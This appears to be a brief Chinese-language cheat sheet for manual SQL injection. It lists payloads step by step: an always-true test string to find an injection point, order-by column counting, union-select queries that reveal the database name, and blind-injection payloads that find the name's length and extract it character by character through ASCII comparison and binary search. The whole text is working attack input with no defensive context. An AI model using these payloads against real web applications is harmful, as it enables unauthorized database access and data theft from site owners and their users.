sql手注

存在注入点
1' or 1=1 #
判断字段数
1' order by 2 #
联合查询获取显示位
1' union select 1,2 #
获取数据库信息
1' union select 1,(select database()) #

• 盲注

判断数据库名长度

1' and length(database())=8 #

二分法

从第一个字符截取截取一个字符
1' and ascii(substr(database(),1,1))<122 #